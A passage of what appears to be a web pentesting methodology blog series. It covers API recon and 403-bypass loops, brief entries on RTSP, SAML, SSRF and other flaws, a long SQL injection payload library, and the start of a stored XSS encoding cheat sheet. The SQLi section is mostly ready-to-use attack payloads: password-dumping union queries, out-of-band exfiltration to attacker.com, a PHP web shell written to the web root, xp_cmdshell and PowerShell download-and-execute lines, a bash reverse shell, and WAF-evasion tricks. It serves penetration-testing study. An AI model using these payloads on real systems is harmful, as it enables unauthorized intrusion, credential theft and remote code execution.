for v in v1 v2 v3 v4 v0 beta alpha internal; do
  status=$(curl -so /dev/null -w "%{http_code}" \
    "https://api.target.com/$v/users")
  echo "/$v/users: $status"
done

# Check Swagger/OpenAPI docs:
for path in swagger-ui swagger-ui.html api-docs openapi.json \
            swagger.json swagger.yaml redoc v1/swagger.json; do
  curl -si "https://target.com/$path" | head -3
done

# Find API from JS bundles:
grep -rn "api/v\|endpoint\|baseURL\|apiUrl" --include="*.js" . | \
  grep -v "node_modules"

# Wayback Machine for old API endpoints:
waybackurls api.target.com | grep -E "/api/v[0-9]" | sort -u

# ffuf with API wordlist:
ffuf -u https://api.target.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,403 -o api_endpoints.json

Tools

# Burp Suite:
# - Proxy: capture all API traffic
# - Repeater: manual BOLA/BFLA testing
# - Scanner: automated IDOR detection
# - Extensions: Autorize (BOLA), AuthMatrix (BFLA), Param Miner

# mitmproxy — API traffic interception:
mitmproxy --mode transparent --ssl-insecure

# Postman / Insomnia — API testing:
# Import Swagger/OpenAPI spec → test all endpoints

# REST-assured (Java) — automated API testing framework

# jwt_tool — JWT analysis (see 28_JWT.md):
python3 jwt_tool.py TOKEN -t

# ffuf — API endpoint fuzzing:
ffuf -u "https://api.target.com/v1/FUZZ" \
  -H "Authorization: Bearer TOKEN" \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt

# Autorize (Burp extension):
# Automatic BOLA testing — replays every request with low-priv token
# and compares responses

# 403 bypass techniques:
for h in "X-Original-URL" "X-Rewrite-URL" "X-Custom-IP-Authorization" \
         "X-Forwarded-For" "X-Forward-For" "X-Remote-IP"; do
  curl -s -H "$h: 127.0.0.1" "https://api.target.com/admin/users" | head -5
done

# HTTP method fuzzing:
for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; do
  status=$(curl -so /dev/null -w "%{http_code}" \
    -X "$method" "https://api.target.com/v1/users/1337" \
    -H "Authorization: Bearer LOW_PRIV_TOKEN")
  echo "$method: $status"
done

Remediation Reference

BOLA: validate object ownership on every request — not just authentication
BFLA: enforce function-level authorization server-side — client-side hiding is not protection
Mass Assignment: use allowlists for accepted fields — never auto-bind all request body fields
Rate Limiting: apply per user, per IP, and per endpoint — use token bucket or sliding window algorithms
Excessive Data Exposure: return only the fields needed — use response DTOs, never serialise full DB models
Shadow APIs: inventory and decommission old API versions; redirect with 301 or return 410 Gone
API Documentation: restrict Swagger/OpenAPI access to internal network or require authentication
Versioning strategy: when deprecating, enforce authorization controls on old versions equally

Part of the Web Application Penetration Testing Methodology series.

RTSP — Real Time Streaming Protocol

Tue, 24 Feb 2026 00:00:00 +0000

Overview

RTSP (Real Time Streaming Protocol, RFC 2326) is an application-layer protocol for controlling media streaming servers. It is used extensively in IP cameras, NVRs (Network Video Recorders), DVRs, media servers, and surveillance infrastructure. RTSP is commonly found on port 554 and is frequently misconfigured to allow unauthenticated stream access. Exposed RTSP streams are a significant privacy and security risk in corporate, industrial, and residential environments.

Default Ports:

Port	Service
554	RTSP (standard)
8554	RTSP (alternative)
8080	RTSP over HTTP tunneling
1935	RTMP (related streaming protocol)

Protocol Overview

RTSP is a stateful protocol that uses HTTP-like methods:

SAML Attacks

Tue, 24 Feb 2026 00:00:00 +0000

SAML Attacks

Severity: Critical | CWE: CWE-287, CWE-347, CWE-611 OWASP: A07:2021 – Identification and Authentication Failures

What Is SAML?

SAML (Security Assertion Markup Language) is an XML-based SSO standard. The Service Provider (SP) delegates authentication to an Identity Provider (IdP). The IdP returns a signed SAML Assertion inside a SAMLResponse, which the SP must validate before granting access.

User → SP → (redirect) → IdP → (user authenticates) → IdP issues SAMLResponse
           ← POST SAMLResponse ← (redirect back to SP ACS URL)
SP validates signature → extracts NameID/attributes → creates session

Critical fields in a SAMLResponse:

Security Headers Misconfiguration

Tue, 24 Feb 2026 00:00:00 +0000

Security Headers Misconfiguration

Severity: Low–High (context dependent) | CWE: CWE-693, CWE-1021 OWASP: A05:2021 – Security Misconfiguration

What Are Security Headers?

HTTP security headers are directives sent by the server that instruct the browser how to handle the response, what resources to trust, and what features to allow. Missing or misconfigured security headers don’t typically provide direct exploitation — they remove browser-enforced mitigations, which means other vulnerabilities (XSS, clickjacking, MIME sniffing) become more exploitable.

Server-Side Includes (SSI) Injection

Tue, 24 Feb 2026 00:00:00 +0000

Server-Side Includes (SSI) Injection

Severity: High–Critical | CWE: CWE-97 OWASP: A03:2021 – Injection

What Is SSI Injection?

Server-Side Includes are directives embedded in HTML files that the web server processes before sending the response. When user input is reflected in .shtml, .shtm, .stm, or SSI-enabled pages without sanitization, injected directives execute with web-server privileges.

Apache SSI directive syntax: <!--#directive param="value" -->
IIS SSI directive syntax:    <!--#include file="..." -->

Injected: <!--#exec cmd="id" --> → server executes 'id' and includes output

SSI is underrated in modern apps because:

Server-Side Request Forgery (SSRF)

Tue, 24 Feb 2026 00:00:00 +0000

Server-Side Request Forgery (SSRF)

Severity: Critical CWE: CWE-918 OWASP: A10:2021 – Server-Side Request Forgery PortSwigger Rank: Top-tier, dedicated learning path

What Is SSRF?

Server-Side Request Forgery (SSRF) occurs when an attacker can make the server issue HTTP (or other protocol) requests to an arbitrary destination — whether internal services, cloud metadata endpoints, or external infrastructure — on the attacker’s behalf.

The danger lies in what the server already has access to: internal APIs, admin interfaces, cloud IAM credentials, databases, microservices behind firewalls. The server trusts itself; SSRF abuses that trust.

Server-Side Template Injection (SSTI)

Tue, 24 Feb 2026 00:00:00 +0000

Server-Side Template Injection (SSTI)

Severity: Critical CWE: CWE-94 OWASP: A03:2021 – Injection

What Is SSTI?

Server-Side Template Injection occurs when user input is embedded unsanitized into a template that is then rendered server-side. Unlike XSS (where input is reflected in HTML), SSTI input is processed by the template engine itself — meaning arbitrary expressions, object traversal, and in most cases, OS command execution.

The severity is almost always critical: most template engines provide access to the underlying language runtime, and sandbox escapes are well-documented for every major engine.

Session Fixation

Tue, 24 Feb 2026 00:00:00 +0000

Session Fixation

Severity: High | CWE: CWE-384 OWASP: A07:2021 – Identification and Authentication Failures

What Is Session Fixation?

Session fixation occurs when an application does not issue a new session identifier after successful authentication. An attacker who can set or predict the victim’s pre-authentication session ID can then wait for the victim to log in and immediately reuse that same ID to gain authenticated access.

The classic scenario requires the attacker to be able to push a known session ID to the victim — via URL parameter, cookie injection, or subdomain cookie injection.

Session Puzzling / Session Variable Overloading

Tue, 24 Feb 2026 00:00:00 +0000

Session Puzzling / Session Variable Overloading

Severity: High | CWE: CWE-384, CWE-613 OWASP: A07:2021 – Identification and Authentication Failures

What Is Session Puzzling?

Session Puzzling (also called Session Variable Overloading) is a vulnerability where the same session variable is used for different purposes in different application contexts, and an attacker can exploit this reuse to bypass authentication or authorization controls.

The core issue: when the same key in the session store holds different semantic meaning depending on which workflow put it there, an attacker can use one workflow to set a value that satisfies the check in another workflow.

Shadow APIs & Zombie Endpoints

Tue, 24 Feb 2026 00:00:00 +0000

Shadow APIs & Zombie Endpoints

Severity: High | CWE: CWE-200, CWE-284 OWASP: A09:2021 – Security Logging and Monitoring Failures | A01:2021 – Broken Access Control

What Are Shadow APIs?

Shadow APIs (also called zombie or undocumented APIs) are endpoints that exist in a running application but are not included in the official API documentation, not monitored by security teams, and often not protected by the same controls as documented APIs. They fall into several categories:

SMBGhost — CVE-2020-0796

Tue, 24 Feb 2026 00:00:00 +0000

Overview

CVE-2020-0796, commonly known as SMBGhost (also referred to as CoronaBlue or EternalDarkness), is a pre-authentication remote code execution vulnerability in the SMBv3 (Server Message Block version 3.1.1) compression handling subsystem of the Windows TCP/IP network stack. With a CVSS score of 10.0, it affects Windows 10 versions 1903 and 1909, and the Windows Server Semi-Annual Channel releases version 1903 and 1909.

This vulnerability is wormable — it can propagate without user interaction, similar to EternalBlue (MS17-010). Unlike EternalBlue, SMBGhost targets a newer protocol version and requires no prior knowledge of the target system.

SQL Injection (SQLi)

Tue, 24 Feb 2026 00:00:00 +0000

SQL Injection (SQLi)

Severity: Critical CWE: CWE-89 OWASP: A03:2021 – Injection

What Is SQL Injection?

SQL Injection occurs when user-supplied data is embedded into a SQL query without proper sanitization, allowing an attacker to manipulate the query’s logic. The impact ranges from authentication bypass to full database dump, file read/write, and OS command execution — depending on the database engine and configuration.

Injection Classes at a Glance

Type	Data Returned	Detection
Error-based	Error messages reveal DB info	Syntax errors visible in response
Union-based	Data returned in response body	`ORDER BY` / `UNION` technique
Boolean-based blind	True/False behavioral difference	Response size or content change
Time-based blind	No output — only timing	`SLEEP()` / `WAITFOR DELAY`
Out-of-Band (OOB)	DNS/HTTP exfiltration	Collaborator / interactsh
Second-order	Payload stored, executed later	Multi-step flows
Stacked queries	Execute multiple statements	Depends on DB driver support

Attack Surface Map

Entry Points to Test

# URL parameters:
/items?id=1
/search?q=admin
/user?name=john&sort=id

# POST body (form, JSON, XML):
{"username":"admin","password":"pass"}
username=admin&password=pass

# HTTP headers:
User-Agent: Mozilla/5.0
Referer: https://site.com/page
X-Forwarded-For: 127.0.0.1
Cookie: session=abc; user_id=1
X-Custom-Header: value

# REST paths:
/api/users/1
/api/product/electronics/laptop

# Search & filter fields
# Order/sort parameters
# Pagination: limit, offset, page
# File names in download endpoints
# GraphQL variables that hit SQL backend
# XML / SOAP bodies
# WebSocket messages

Discovery Checklist

Phase 1 — Passive Identification

Map all parameters that interact with the server (URL, body, headers, cookies)
Identify parameters that clearly reflect data from a database (user info, products, results)
Note parameters used for filtering, ordering, searching, or paginating
Check if numeric parameters can be replaced with expressions (1+1, 2-1)
Identify multi-step flows where input stored in step 1 is used in a query in step 2 (second-order)
Review JavaScript for client-side constructed query strings sent to API
Look for verbose error messages (stack traces, DB errors, query fragments)

Phase 2 — Active Detection

Inject a single quote ' — observe error vs no error
Inject '' (escaped quote) — does the response return to normal?
Inject 1 AND 1=1 vs 1 AND 1=2 — boolean difference?
Inject 1 OR 1=1 — does result set expand?
Inject 1; SELECT SLEEP(5) — does response delay?
Inject comment sequences: --, #, /**/, /*!*/
Try numeric context: 1+1 returns same as 2?
Inject ORDER BY 1, ORDER BY 100 — error on high number reveals column count
Try UNION SELECT NULL with increasing NULLs until no error
Test string context: ' OR '1'='1
Test time-based in all parameters including headers and cookies

Phase 3 — Confirm & Escalate

Determine injectable context (string, numeric, identifier)
Determine database engine (error messages, behavior, functions)
Find column count via ORDER BY
Find printable columns via UNION SELECT NULL,NULL,...
Extract DB version, current user, current database
Enumerate databases → tables → columns → data
Check for FILE privileges (MySQL: LOAD_FILE, INTO OUTFILE)
Check for xp_cmdshell (MSSQL)
Test OOB exfiltration (DNS via load_file, UTL_HTTP, xp_dirtree)
Test stacked queries for write/exec capabilities

Payload Library

Section 1 — Detection & Syntax Break

-- Basic quote injection:
'
''
`
')
"
'))
"))

-- Comment terminators:
' --
' #
' /*
'/**/--
'/*!--*/

-- Numeric context:
1 AND 1=1
1 AND 1=2
1 OR 1=1
1 OR 1=2

-- Always-true / always-false:
' OR '1'='1
' OR '1'='2
' OR 1=1--
' OR 1=2--

-- Expression injection (confirms evaluation):
1+1          -- should behave like 2
1*1
9-8

-- Nested quotes:
''''
''||''

Section 2 — Column Count (ORDER BY)

ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 100--          -- triggers error when > actual column count
ORDER BY 1,2,3--
ORDER BY 1 ASC--
ORDER BY 1 DESC--

-- With URL encoding:
' ORDER BY 1--          -- standard
' ORDER BY 1%23         -- # encoded
' ORDER BY 1%2f%2a      -- /* encoded

Section 3 — Union-Based Extraction

-- Find number of columns (increase NULLs until no error):
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

-- Find printable columns (replace NULL one at a time with string):
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--

-- Extract data (MySQL):
' UNION SELECT 1,version(),3--
' UNION SELECT 1,user(),3--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,@@datadir,3--
' UNION SELECT 1,@@version_compile_os,3--
' UNION SELECT 1,group_concat(schema_name),3 FROM information_schema.schemata--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,group_concat(username,':',password),3 FROM users--

-- PostgreSQL:
' UNION SELECT NULL,version(),NULL--
' UNION SELECT NULL,current_database(),NULL--
' UNION SELECT NULL,current_user,NULL--
' UNION SELECT NULL,string_agg(datname,','),NULL FROM pg_database--
' UNION SELECT NULL,string_agg(tablename,','),NULL FROM pg_tables WHERE schemaname='public'--
' UNION SELECT NULL,string_agg(column_name,','),NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT NULL,string_agg(username||':'||password,','),NULL FROM users--

-- MSSQL:
' UNION SELECT NULL,@@version,NULL--
' UNION SELECT NULL,db_name(),NULL--
' UNION SELECT NULL,user_name(),NULL--
' UNION SELECT NULL,(SELECT STRING_AGG(name,',') FROM master.dbo.sysdatabases),NULL--
' UNION SELECT NULL,(SELECT STRING_AGG(name,',') FROM sysobjects WHERE xtype='U'),NULL--

-- Oracle:
' UNION SELECT NULL,banner,NULL FROM v$version--
' UNION SELECT NULL,user,NULL FROM dual--
' UNION SELECT NULL,(SELECT listagg(table_name,',') WITHIN GROUP (ORDER BY 1) FROM all_tables WHERE owner='APPS'),NULL FROM dual--

Section 4 — Error-Based Extraction

MySQL Error-Based

-- extractvalue (returns value in error message):
' AND extractvalue(1,concat(0x7e,version()))--
' AND extractvalue(1,concat(0x7e,database()))--
' AND extractvalue(1,concat(0x7e,user()))--
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())))--
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(username,':',password) FROM users)))--

-- updatexml:
' AND updatexml(1,concat(0x7e,version()),1)--
' AND updatexml(1,concat(0x7e,(SELECT password FROM users WHERE username='admin' LIMIT 1)),1)--

-- floor/rand (old but reliable):
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

PostgreSQL Error-Based

-- cast to int:
' AND 1=cast(version() as int)--
' AND 1=cast((SELECT password FROM users LIMIT 1) as int)--

-- substring trick:
' AND 1=1/(SELECT 1 FROM (SELECT substring(username,1,1) FROM users LIMIT 1) x WHERE x.substring='a')--

MSSQL Error-Based

-- convert:
' AND 1=convert(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'))--
' AND 1=convert(int,@@version)--

-- cast:
' AND 1=cast((SELECT TOP 1 password FROM users) as int)--

Oracle Error-Based

-- utl_inaddr (DNS lookup — triggers error with data):
' AND 1=utl_inaddr.get_host_address((SELECT version FROM v$instance))--

-- XMLType:
' AND 1=(SELECT UPPER(XMLType(chr(60)||chr(58)||version||chr(62))) FROM v$instance)--

-- Confirm boolean:
' AND 1=1--              -- true: same as normal response
' AND 1=2--              -- false: different/empty response

-- Extract data char by char:
' AND SUBSTRING(version(),1,1)='5'--
' AND SUBSTRING(version(),1,1)='8'--
' AND ASCII(SUBSTRING(version(),1,1))>50--
' AND ASCII(SUBSTRING(version(),1,1))=56--    -- binary search

-- Extract DB name:
' AND SUBSTRING(database(),1,1)='a'--
' AND LENGTH(database())=5--

-- Check if table exists:
' AND (SELECT COUNT(*) FROM users)>0--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='admin_users')>0--

-- Check if row exists:
' AND (SELECT COUNT(*) FROM users WHERE username='admin')=1--

-- Extract password of admin:
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--

-- PostgreSQL boolean:
' AND SUBSTR(version(),1,1)='P'--
' AND (SELECT COUNT(*) FROM pg_tables WHERE tablename='users')>0--

-- MySQL:
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=2,SLEEP(5),0)--                           -- no delay (false)
' AND IF(SUBSTRING(version(),1,1)='8',SLEEP(5),0)--  -- delay if true
' AND IF(LENGTH(database())=10,SLEEP(5),0)--

-- PostgreSQL:
'; SELECT pg_sleep(5)--
' AND (SELECT 1 FROM pg_sleep(5))--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN SUBSTR(version(),1,1)='P' THEN pg_sleep(5) ELSE pg_sleep(0) END)--

-- MSSQL:
'; WAITFOR DELAY '0:0:5'--
' AND IF(1=1) WAITFOR DELAY '0:0:5'--
'; IF (SELECT COUNT(*) FROM users)>0 WAITFOR DELAY '0:0:5'--

-- Oracle:
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' AND (SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 1 END FROM DUAL)=1--

-- SQLite:
' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000/2))))--   -- heavy computation delay

Section 7 — Out-of-Band (OOB) Exfiltration

-- MySQL (requires FILE privilege):
' AND LOAD_FILE(concat('\\\\',version(),'.',user(),'.attacker.com\\share'))--
' AND LOAD_FILE(concat(0x5c5c5c5c,version(),0x2e,database(),0x2e,0x6174746163b6572,0x2e636f6d5c5c61))--

-- MSSQL (xp_dirtree — DNS OOB):
'; EXEC master..xp_dirtree '\\attacker.com\share'--
'; EXEC master..xp_fileexist '\\attacker.com\share'--
' AND 1=(SELECT 1 FROM OPENROWSET('SQLOLEDB','server=attacker.com;uid=sa;pwd=sa','SELECT 1'))--

-- MSSQL (DNS exfil with data):
'; DECLARE @q NVARCHAR(1000); SET @q='\\'+@@version+'.attacker.com\share'; EXEC xp_dirtree @q--

-- Oracle (UTL_HTTP):
' AND 1=(SELECT UTL_HTTP.REQUEST('http://attacker.com/'||user) FROM DUAL)--

-- Oracle (UTL_FILE / DNS):
' AND 1=(SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM DUAL)||'.attacker.com') FROM DUAL)--

-- PostgreSQL (COPY):
'; COPY (SELECT version()) TO PROGRAM 'curl http://attacker.com/?d=$(version)'--
'; CREATE TABLE tmp(data text); COPY tmp FROM PROGRAM 'curl -s http://attacker.com/'--

Section 8 — Stacked Queries & File R/W

MySQL File Read/Write

-- Read file (requires FILE privilege):
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT LOAD_FILE('/var/www/html/config.php')--
' UNION SELECT LOAD_FILE('/root/.ssh/id_rsa')--

-- Write file (requires FILE + write permissions):
' UNION SELECT '<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT '' INTO DUMPFILE '/var/www/html/shell.php'--

-- Write with newlines encoded:
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b22636d64225d293b3f3e INTO OUTFILE '/var/www/html/shell.php'--

MSSQL xp_cmdshell

-- Enable xp_cmdshell (requires sysadmin):
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;--
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

-- Execute OS command:
'; EXEC xp_cmdshell 'whoami'--
'; EXEC xp_cmdshell 'certutil -urlcache -split -f http://attacker.com/shell.exe C:\shell.exe && C:\shell.exe'--

-- Read file via xp_cmdshell:
'; EXEC xp_cmdshell 'type C:\Windows\win.ini'--

-- MSSQL reverse shell via PowerShell:
'; EXEC xp_cmdshell 'powershell -c "iex(New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"'--

PostgreSQL RCE

-- COPY TO PROGRAM (PostgreSQL 9.3+, requires superuser):
'; COPY (SELECT '') TO PROGRAM 'id > /tmp/out'--
'; COPY (SELECT '') TO PROGRAM 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'--

-- Large object execution:
'; SELECT lo_import('/etc/passwd')--
'; SELECT lo_export(16384,'/var/www/html/shell.php')--

-- Extension loading (superuser):
'; CREATE EXTENSION IF NOT EXISTS plpython3u;--
'; CREATE OR REPLACE FUNCTION sys(cmd TEXT) RETURNS TEXT AS $$ import subprocess; return subprocess.getoutput(cmd) $$ LANGUAGE plpython3u;--
'; SELECT sys('id');--

Section 9 — WAF Bypass Techniques

Comment Injection (break keywords)

-- MySQL inline comments:
UN/**/ION SEL/**/ECT
UN/*!50000ION*/ SELECT
UNION/*bypass*/SELECT
SEL/**/ECT 1,2,3

-- Equivalent comments:
'/**/OR/**/1=1--
'/*!OR*/1=1--

-- Version-specific bypass:
/*!UNION*//*!SELECT*/1,2,3--

Case & Encoding Bypasses

-- Case variation:
uNiOn SeLeCt
UnIoN SeLeCT
UNION%20SELECT

-- URL encoding:
%55NION%20%53ELECT
UNION%0aSELECT          -- newline instead of space
UNION%09SELECT           -- tab instead of space
UNION%0cSELECT           -- form feed

-- Double URL encode:
%2555NION%2520SELECT

-- HTML entity (when input reflected in HTML context):
&#85;NION &#83;ELECT

Space Substitution

-- Replace spaces with:
UNION/**/SELECT
UNION%09SELECT          -- tab
UNION%0aSELECT          -- newline
UNION%0cSELECT          -- form feed
UNION%0dSELECT          -- carriage return
UNION%a0SELECT          -- non-breaking space
UNION(1)                -- parentheses (some contexts)

String Bypass (when quotes filtered)

-- Hex encoding:
SELECT 0x61646d696e          -- 'admin'
WHERE username=0x61646d696e

-- char() function:
WHERE username=char(97,100,109,105,110)   -- MySQL
WHERE username=chr(97)||chr(100)||chr(109)||chr(105)||chr(110)  -- PostgreSQL/Oracle

-- concat:
WHERE username=concat(char(97),char(100),char(109))

-- Dynamic query:
'; EXEC('SEL'+'ECT * FROM users')--   -- MSSQL string concat

-- Bypass with LIKE/wildcard:
WHERE username LIKE 0x61646d696e

Filter Bypass for Specific Keywords

-- "UNION" blocked:
UNiOn, UnIoN, UNION/**/, /*!UNION*/

-- "SELECT" blocked:
SELect, sElEcT, SEL/**/ECT, /*!SELECT*/

-- "WHERE" blocked:
WHere, wHeRe, /*!WHERE*/

-- "AND/OR" blocked:
&&, ||, %26%26, %7c%7c

-- "=" blocked:
LIKE, REGEXP, BETWEEN 'a' AND 'b', IN('admin')
WHERE username BETWEEN 'admin' AND 'admin'

-- Comparison operators:
> (greater than)
< (less than)
!= (not equal)
<> (not equal)

Second-Order Injection

-- Step 1: Register with payload as username:
Username: admin'--

-- Step 2: Application stores raw input in DB
-- Step 3: Password change query uses stored username:
UPDATE users SET password='newpass' WHERE username='admin'--'

-- Effect: password of 'admin' changed, not the attacker's account

-- Common second-order sinks:
-- Profile update
-- Password reset
-- Email preferences
-- Log viewers (stored → viewed by admin → executed)

Section 10 — Database Fingerprinting

-- MySQL:
SELECT @@version          -- 8.0.x
SELECT version()
SELECT @@datadir
SELECT @@basedir
'  →  error mentions "MySQL" or "MariaDB"

-- PostgreSQL:
SELECT version()          -- PostgreSQL 14.x
SELECT current_setting('server_version')
SELECT pg_sleep(0)        -- function exists

-- MSSQL:
SELECT @@version          -- Microsoft SQL Server 2019
SELECT @@servername
SELECT getdate()
WAITFOR DELAY '0:0:0'

-- Oracle:
SELECT banner FROM v$version
SELECT * FROM v$instance
SELECT user FROM dual
dual table exists

-- SQLite:
SELECT sqlite_version()
SELECT typeof(1)

-- Differentiate MySQL vs MSSQL:
-- MySQL:   SELECT 1+1  → 2
-- MSSQL:   SELECT 1+1  → 2   (same, use other methods)
-- MySQL:   # comment works
-- MSSQL:   # does NOT work, use --

-- Universal detection order:
'  →  if error: note DB type from error message
' AND SLEEP(5)--           → MySQL
' AND pg_sleep(5)--        → PostgreSQL
' WAITFOR DELAY '0:0:5'--  → MSSQL
' AND 1=dbms_pipe.receive_message('a',5)--  → Oracle

Section 11 — Authentication Bypass

-- Classic:
admin'--
admin' #
' OR 1=1--
' OR '1'='1
' OR 1=1#
' OR 1=1/*

-- Username field:
admin'/*
') OR ('1'='1
') OR ('1'='1'--

-- With password field both:
Username: admin'--
Password: anything

-- Bypass with AND/OR logic:
' OR 1=1 LIMIT 1--
' OR 1=1 ORDER BY 1--
') OR (1=1)--
1' OR '1'='1

-- Time-based auth bypass (extract admin hash):
' AND IF(SUBSTR((SELECT password FROM users WHERE username='admin'),1,1)='a',SLEEP(5),0)--

Tools

# SQLMap — automated detection and exploitation:
sqlmap -u "https://target.com/items?id=1" --dbs
sqlmap -u "https://target.com/items?id=1" -D dbname --tables
sqlmap -u "https://target.com/items?id=1" -D dbname -T users --dump
sqlmap -u "https://target.com/items?id=1" --os-shell
sqlmap -u "https://target.com/items?id=1" --file-read=/etc/passwd
sqlmap -u "https://target.com/items?id=1" --level=5 --risk=3
sqlmap -u "https://target.com/items?id=1" --technique=BEU --dbms=mysql
sqlmap -u "https://target.com/items?id=1" --tamper=space2comment,randomcase

# SQLMap with POST:
sqlmap -u "https://target.com/login" --data="username=admin&password=pass" -p username

# SQLMap from Burp request file:
sqlmap -r request.txt --level=5 --risk=3

# SQLMap cookies:
sqlmap -u "https://target.com/" --cookie="session=abc; id=1" -p id

# SQLMap headers:
sqlmap -u "https://target.com/" --headers="User-Agent: *" --level=3

# Tamper scripts (WAF bypass):
--tamper=apostrophemask        # ' → %EF%BC%87
--tamper=base64encode          # encodes payload
--tamper=between               # > → BETWEEN
--tamper=bluecoat              # space → %09
--tamper=charencode            # URL encodes each char
--tamper=charunicodeencode     # Unicode encodes
--tamper=equaltolike           # = → LIKE
--tamper=greatest              # > → GREATEST
--tamper=halfversionedmorekeywords  # MySQL < 5.1 bypass
--tamper=htmlencode            # HTML entities
--tamper=ifnull2ifisnull       # IFNULL → IF(ISNULL)
--tamper=modsecurityversioned  # versioned comments
--tamper=multiplespaces        # multiple spaces
--tamper=nonrecursivereplacement  # double keywords
--tamper=percentage            # %S%E%L%E%C%T
--tamper=randomcase            # random case
--tamper=space2comment         # space → /**/
--tamper=space2dash            # space → --\n
--tamper=space2hash            # space → #\n (MySQL)
--tamper=space2morehash        # space → #hash\n
--tamper=space2mssqlblank      # space → MS-specific blank
--tamper=space2mysqlblank      # space → MySQL blank
--tamper=space2plus            # space → +
--tamper=sp_password           # appends sp_password (log hiding MSSQL)
--tamper=unmagicquotes         # \' → %bf%27
--tamper=versionedkeywords     # keywords → /*!keyword*/
--tamper=versionedmorekeywords # more keywords versioned

Remediation Reference

Parameterized queries / Prepared statements: the only reliable fix — never concatenate user input into SQL
ORM with safe query builders: use the ORM’s parameterization, never raw string interpolation
Input validation: whitelist permitted characters (digits only for IDs); this is a secondary defense
Least privilege: database account should have only the permissions required — no FILE, no xp_cmdshell
WAF: useful as defense-in-depth but not a substitute for parameterized queries
Error handling: never expose raw SQL errors to users — log internally, return generic message

Part of the Web Application Penetration Testing Methodology series. Previous: Index | Next: Chapter 02 — NoSQL Injection

Stored XSS: Sanitization Bypass & Encoding Arsenal

Tue, 24 Feb 2026 00:00:00 +0000

Stored XSS: Sanitization Bypass & Encoding Arsenal

Severity: Critical | CWE: CWE-79 | OWASP: A03:2021 Reference: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Sanitization Stack — Read Before Testing

Stored XSS payloads must survive two passes: sanitization at write time AND output encoding (or lack thereof) at render time. They also traverse the full stack:

[WRITE PATH]
Browser form → client-side JS validation → server input filter → DB storage

[READ PATH]
DB → template engine → browser HTML parser → DOM

Bypass strategy per layer:
  Client JS    → intercept in Burp, submit raw
  Input filter → encoded payload that decodes to XSS after storage
  DB charset   → some DBs strip/alter bytes (test: store emoji, check encoding)
  Template     → look for | safe, | raw, {{{var}}}, dangerouslySetInnerHTML
  Browser      → mXSS: sanitized string re-parsed differently

Identify Output Context Before Picking Payload

# Submit unique string → visit all pages where it appears → view source
# Find exact rendering:

<div class="comment">YOUR_INPUT</div>         → Context A: HTML body
<input value="YOUR_INPUT">                    → Context B: double-quoted attr
<a href="YOUR_INPUT">                         → Context C: href
<script>var msg = "YOUR_INPUT";</script>      → Context D: JS string
<!-- YOUR_INPUT -->                           → Context E: HTML comment
<script>var cfg = {user: YOUR_INPUT};</script>→ Context F: JS unquoted

Payload Table — All Encoding Variants

`<script>` in HTML Body Context

[RAW]
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

[HTML ENTITY — decimal]
&#60;script&#62;alert(1)&#60;/script&#62;
&#60;script&#62;alert(document.domain)&#60;/script&#62;

[HTML ENTITY — hex]
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
&#x3c;script&#x3e;alert(document.domain)&#x3c;/script&#x3e;

[HTML ENTITY — hex zero-padded (common WAF bypass)]
&#x003c;script&#x003e;alert(1)&#x003c;/script&#x003e;
&#x003c;script&#x003e;alert(document.domain)&#x003c;/script&#x003e;

[HTML ENTITY — no semicolons]
&#60script&#62alert(1)&#60/script&#62
&#x3cscript&#x3ealert(document.domain)&#x3c/script&#x3e

[URL ENCODED]
%3Cscript%3Ealert(1)%3C%2Fscript%3E
%3cscript%3ealert(document.domain)%3c%2fscript%3e

[DOUBLE URL ENCODED]
%253Cscript%253Ealert(1)%253C%252Fscript%253E

[UNICODE — for JS context or template injection]
\u003cscript\u003ealert(1)\u003c/script\u003e

[HTML COMMENT KEYWORD BREAK — fools regex filters]
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr<!--esi-->ipt>alert(1)</script>
<scr/**/ipt>alert(1)</script>
<SCRIPT>alert(1)</SCRIPT>
<ScRiPt>alert(document.domain)</ScRiPt>

`<img>` onerror — Core Stored XSS Payload

[RAW]
<img src=x onerror=alert(1)>
<img src=1 onerror=confirm(1)>
<img src=x onerror=alert(document.domain)>
<img src=x onerror=alert(document.cookie)>

[HTML ENTITY — brackets only]
&#x3c;img src=x onerror=alert(1)&#x3e;
